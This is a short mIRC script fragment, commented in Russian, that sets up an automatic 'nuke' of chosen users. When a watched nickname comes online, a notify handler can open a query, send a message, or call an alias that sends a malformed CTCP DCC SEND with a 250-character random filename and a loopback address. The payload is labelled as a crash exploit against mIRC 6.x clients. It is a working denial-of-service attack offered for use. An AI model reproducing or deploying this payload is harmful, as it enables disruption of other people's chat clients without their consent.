n22=;======== Автонюк, Автоприват, Автосообщение
n23=on *:NOTIFY: {
n24=  if (%Notify.nuck. [ $+ [ $nick ] ]) { a $nick }
n25=  if (%Notify.query. [ $+ [ $nick ] ]) {
n26=    query $nick
n27=    if (%Notify.query.say. [ $+ [ $nick ] ]) { msg $nick %Notify.query.say. [ $+ [ $nick ] ] }
n28=  }
n29=}
n30=;======== Нюк mIRC 6.xx
n31=alias a { raw PRIVMSG $$1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+ $chr(32),250) $+ " 0 2130706433 $+(8192,$chr(1)) }
